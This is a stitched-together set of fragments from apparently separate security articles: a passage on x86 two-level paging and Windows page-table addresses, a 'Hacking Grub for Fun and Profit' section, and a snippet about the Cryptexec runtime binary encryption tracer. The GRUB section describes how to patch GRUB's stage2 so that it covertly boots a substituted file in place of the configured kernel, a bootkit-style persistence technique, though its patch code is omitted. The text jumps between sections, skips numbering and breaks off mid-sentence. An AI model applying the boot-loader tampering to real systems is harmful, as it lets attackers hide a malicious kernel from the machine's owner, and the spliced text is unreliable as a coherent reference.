These points are illustrated by Figure 1.

    VIRTUAL ADDRESS                      PHYSICAL ADDRESS
         SPACE                                SPACE

    /-------------\                      /-------------\
    |             |                      |             |
    |   PAGE 01   |---\   /----------->>>|  FRAME 01   |
    |             |   |   |              |             |
    ---------------   |   |              ---------------
    |             |   |   |              |             |
    |   PAGE 02   |------------------->>>|  FRAME 02   |
    |             |   |   |              |             |
    ---------------   |   |              ---------------
    |             |   |   |              |             |
    |   PAGE 03   |   \---|----------->>>|  FRAME 03   |
    |             |       |              |             |
    ---------------       |              \-------------/
    |             |       |
    |   PAGE 04   |       |
    |             |       |
    |-------------|       |
    |             |       |
    |   PAGE 05   |-------/
    |             |
    \-------------/

Figure 1 - Virtual To Physical Memory Mapping (Paging)

NOTE: 1. Virtual & physical address spaces are divided into fixed size blocks.
      2. The virtual address space may be larger than the physical address space.
      3. Virtually contiguous blocks do not have to be mapped to physically contiguous frames.

2.2 - Page Tables & PTEs

The mapping information that connects a virtual address with its physical frame is stored in page tables in structures known as PTEs. PTEs also store status information. Status bits may indicate, for example, whether or not a page is valid (physically present in memory versus stored on disk), if it is writable, or if it is a user / supervisor page. Figure 2 shows the format for an x86 PTE.

2.4 - Virtual To Physical Address Translation

Virtual addresses encode the information necessary to find their PTEs in the page table. They are divided into 2 basic parts: the virtual page number and the byte index. The virtual page number provides the index into the page table while the byte index provides an offset into the physical frame. When a memory reference occurs, the PTE for the page is looked up in the page table by adding the page table base address to the virtual page number * PTE entry size. The base address of the page in physical memory is then extracted from the PTE and combined with the byte offset to define the physical memory address that is sent to the memory unit.

If the virtual address space is particularly large and the page size relatively small, it stands to reason that it will require a large page table to hold all of the mapping information. And as the page table must remain resident in main memory, a large table can be costly. One solution to this dilemma is to use a multi-level paging scheme. A two-level paging scheme, in effect, pages the page table. It further subdivides the virtual page number into a page directory index and a page table index. The page directory is simply a table of pointers to page tables. This two level paging scheme is the one supported by the x86. Figure 3 illustrates how the virtual address is divided up to index the page directory and page tables and Figure 4 illustrates the process of address translation.

A memory access under a 2 level paging scheme potentially involves the following sequence of steps.

  1. Lookup of page directory entry (PDE).
     Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page Directory Index (extracted from the virtual address that caused the memory access).
     NOTE: Windows maps the page directory to virtual address 0xC0300000. Base addresses for page directories are also located in KPROCESS blocks and the register cr3 contains the physical address of the current page directory.

  2. Lookup of page table entry (PTE).
     Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table Index (extracted from the virtual address that caused the memory access).
     NOTE: Windows maps the page tables to virtual address 0xC0000000. The base physical address for the page table is also stored in the page directory entry.
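As a rough illustration of the two lookups above, the following C sketch splits a 32-bit virtual address and computes where its PDE and PTE would be found. It assumes classic non-PAE x86 paging with 4 KB pages, i.e. a 10-bit page directory index, a 10-bit page table index, a 12-bit byte offset, and 4-byte entries. The two base addresses are the Windows mappings quoted in the text; the function and macro names are hypothetical, and the PTE value in any call is made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_DIR_VA    0xC0300000u  /* Windows mapping of the page directory (from the text) */
#define PAGE_TABLES_VA 0xC0000000u  /* Windows mapping of the page tables (from the text)    */
#define ENTRY_SIZE     4u           /* assumed: 4-byte PDE/PTE, non-PAE                      */
#define PAGE_SIZE      0x1000u      /* assumed: 4 KB pages                                   */
#define PTE_VALID      0x1u         /* bit 0 of an x86 PTE: page is present                  */

/* Top 10 bits: index into the page directory. */
static uint32_t pd_index(uint32_t va)    { return va >> 22; }
/* Middle 10 bits: index into the selected page table. */
static uint32_t pt_index(uint32_t va)    { return (va >> 12) & 0x3FFu; }
/* Low 12 bits: byte offset inside the 4 KB frame. */
static uint32_t byte_offset(uint32_t va) { return va & 0xFFFu; }

/* Step 1: PDE = page directory base + sizeof(PDE) * page directory index. */
static uint32_t pde_address(uint32_t va)
{
    return PAGE_DIR_VA + ENTRY_SIZE * pd_index(va);
}

/* Step 2: PTE = page table base + sizeof(PTE) * page table index.
 * Each page table occupies one page of the mapped region, so the base of
 * the table selected by the directory index is PAGE_TABLES_VA + index * 4 KB. */
static uint32_t pte_address(uint32_t va)
{
    uint32_t table_base = PAGE_TABLES_VA + PAGE_SIZE * pd_index(va);
    return table_base + ENTRY_SIZE * pt_index(va);
}

/* Combine the frame base held in a valid PTE with the byte offset. */
static uint32_t physical_address(uint32_t pte, uint32_t va)
{
    assert(pte & PTE_VALID);  /* an invalid PTE would raise a page fault instead */
    return (pte & 0xFFFFF000u) | byte_offset(va);
}
```

For the virtual address 0x80123456 this gives a directory index of 0x200, a table index of 0x123 and an offset of 0x456, so the PDE sits at 0xC0300800 and the PTE at 0xC020048C.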

Hacking Grub for Fun and Profit

[...] stage1.5) -> stage2. Everything is in position. asm.S will switch to protected mode, open /boot/grub/grub.conf (or menu.lst), get the configuration, display menus, and wait for the user's interaction. After the user chooses the kernel, grub loads the specified kernel image (sometimes a ramdisk image also), then boots the kernel.

1.4 - Grub util

If your grub is overwritten by Windows, you can use grub util to reinstall grub.

[content omitted, please see electronic version]

We can see grub util tries to embed stage1.5 if possible. If grub is installed in the MBR, stage1.5 is located after the MBR, 22 sectors in size. If grub is installed in the boot sector, there's not enough space to embed stage1.5 (the superblock is at offset 0x400 for an ext2/ext3 partition, leaving only 0x200 for stage1.5), so the embed command fails.

Refer to the grub manual and source code for more info.

2.0 - Possibility to load specified file

Grub has its own mini-file-system for ext2/3. It uses grub_open(), grub_read() and grub_close() to open/read/close a file. Now, take a look at ext2fs_dir:

[content omitted, please see electronic version]

Suppose the line in grub.conf is:

    kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1

grub_open calls ext2fs_dir("/boot/vmlinuz-2.6.11 ro root=/dev/hda1"), ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to get data at any offset (the map resides in INODE->i_blocks[] for direct blocks).

The internals of ext2fs_dir are:

  1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
     ^ inode = EXT2_ROOT_INO, put inode info in INODE;
  2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
      ^ find dentry in '/', then put the inode info of '/boot' in INODE;
  3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
           ^ find dentry in '/boot', then put the inode info of '/boot/vmlinuz-2.6.11' in INODE;
  4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
                         ^ the pointer is at a space, INODE is a regular file, returns 1 (success), INODE contains info about '/boot/vmlinuz-2.6.11'.

If we parasitize this code and return the inode info of file_fake, grub will happily load file_fake, considering it to be /boot/vmlinuz-2.6.11.

We can do this:

  1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
     ^ inode = EXT2_ROOT_INO;
  2. boot/vmlinuz-2.6.11 ro root=/dev/hda1
     ^ change it to 0x0, change EXT2_ROOT_INO to the inode of file_fake;
  3. boot/vmlinuz-2.6.11 ro root=/dev/hda1
     ^ EXT2_ROOT_INO (file_fake) info is in INODE, the pointer is 0x0, INODE is a regular file, returns 1.

Since we change the argument of ext2fs_dir, does it have side-effects? Don't forget the latter part "ro root=/dev/hda1"; it's the parameter passed to the kernel. Without it, the kernel won't boot correctly. (P.S.: Just "cat /proc/cmdline" to see the parameters your kernel has.)

So, let's check the internals of "kernel=...". kernel_func processes the "kernel=..." line:

    static int
    kernel_func (char *arg, int flags)
    {
      ...
      /* Copy the command-line to MB_CMDLINE.  */
      grub_memmove (mb_cmdline, arg, len + 1);
      kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);
      ...
    }

See? arg and mb_cmdline hold 2 copies of the string "/boot/vmlinuz-2.6.11 ro root=/dev/hda1" (there is no overlap, so in fact grub_memmove is the same as grub_memcpy here). In load_image, you can find that arg and mb_cmdline don't mix with each other. So, the conclusion is - NO side-effects. If you're not confident, you can add some code to put things back.

3.0 - Hacking techniques

The hacking techniques should be general for all grub versions (excluding grub-ng) shipped with all Linux distros.

3.1 - how to load file_fake

We can add a jump at the beginning of ext2fs_dir, then set the first character of ext2fs_dir's argument to 0, change "current_ino = EXT2_ROOT_INO" to "current_ino = INODE_OF_FAKE_FILE", then jump back.
Attention: file_fake may be loaded only when a certain condition is met. E.g.: when the system wants to open /boot/vmlinuz-2.6.11, then /boot/file_fake is returned; while when the system wants /boot/grub/grub.conf, the correct file should be returned. If the code still returns /boot/file_fake, oops, no menu display.

The jump is easy, but how to make "current_ino = INODE_OF_FAKE_FILE"?

    int ext2fs_dir (char *dirname)
    {
      int current_ino = EXT2_ROOT_INO;  /* start at the root */
      int updir_ino = current_ino;      /* the parent of the current directory */
      ...

EXT2_ROOT_INO is 2, so current_ino and updir_ino are initialized to 2. The corresponding assembly code should be like 'movl $2, 0xffffXXXX(%esp)'. But keep optimization in mind: both current_ino and updir_ino are assigned 2, so the optimized result can be 'movl $2, 0xffffXXXX(%esp)' and 'movl $2, 0xffffYYYY(%esp)', or 'movl $2, %reg' then 'movl %reg, 0xffffXXXX(%esp)' 'movl %reg, 0xffffYYYY(%esp)', or more variants. The type is int and the value is 2, so the possibility of 'xor %eax, %eax; inc %eax; inc %eax' is low; the same goes for 'xor %eax, %eax; movb $0x2, %al'. What we need is to search for 0x00000002 from ext2fs_dir to ext2fs_dir + depth (e.g.: 100 bytes), then change 0x00000002 to INODE_OF_FAKE_FILE.

[content omitted, please see electronic version]

3.2 - how to locate ext2fs_dir

That's the difficult part. stage2 is generated by objcopy, so all ELF information is stripped - NO SYMBOL TABLE! We must find some PATTERNs to locate ext2fs_dir.

The first choice is log2:

    #define log2(n) ffz(~(n))
    static __inline__ unsigned long
    ffz (unsigned long word)
    {
      __asm__ ("bsfl %1, %0"
               : "=r" (word)
               : "r" (~word));
      return word;
    }
    group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));

The question is, ffz is declared as __inline__, which indicates MAYBE this function is inlined, MAYBE not.
So we give it up.

The next choice is SUPERBLOCK->s_inodes_per_group in

    group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);

    #define RAW_ADDR(x) (x)
    #define FSYS_BUF RAW_ADDR(0x68000)
    #define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))
    struct ext2_super_block
    {
      ...
      __u32 s_inodes_per_group;  /* # Inodes per group */
      ...
    }

Then we calculate that SUPERBLOCK->s_inodes_per_group is at 0x68028. This address only appears in ext2fs_dir, so the possibility of collision is low. After locating 0x68028, we move backwards to get the start of ext2fs_dir. Here comes another question: how to identify the start of ext2fs_dir? Of course you can search backwards for 0xc3, which is likely a ret. But what if it's only part of an instruction, such as an operand? Also, sometimes gcc adds some junk code to make the function address aligned (4 byte/8 byte/16 byte), so how to skip this junk code? Just list all the possible combinations? This method is practical, but not ideal.

Now, we noticed fsys_table:

    struct fsys_entry fsys_table[NUM_FSYS + 1] =
    {
      ...
    # ifdef FSYS_FAT
      {"fat", fat_mount, fat_read, fat_dir, 0, 0},
    # endif
    # ifdef FSYS_EXT2FS
      {"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},
    # endif
    # ifdef FSYS_MINIX
      {"minix", minix_mount, minix_read, minix_dir, 0, 0},
    # endif
      ...
    };

fsys_table is called like this:

    if ((*(fsys_table[fsys_type].mount_func)) () != 1)

So, our trick is:

  1. Search stage2 for the string "ext2fs", get its offset, then convert it to a memory address (stage2 starts from 0800:0000): addr_1.
  2. Search stage2 for addr_1, get its offset, then get the next 5 integers (A, B, C, D, E), A [...]

[...]

Cryptexec: Next-generation Runtime Binary Encryption Using On-demand Function Extraction

    [...] p_lock != 0) flag |= C_BAD;  /* twice */
    +     diza->p_lock = c;
    +     continue;
        }
        break;

I also needed to remove __cdecl on functions, a feature of Win32 C compilers not needed on UNIX platforms.

3.5 - Limitations

* XDE engine (probably) can't handle new instructions (SSE, MMX, etc.). For certain it can't handle 3dNow!
  because they begin with 0x0F 0x0F, a byte sequence which XDE claims is an invalid instruction encoding.
* The tracer shares the same memory with the traced program. If the traced program is so badly broken that it writes to (random) memory it doesn't own, it can stumble upon and overwrite portions of the tracing routine.
* Each form of tracing has its own speed impacts. I didn't measure how much this method slows down program execution (especially compared to ptrace()).
*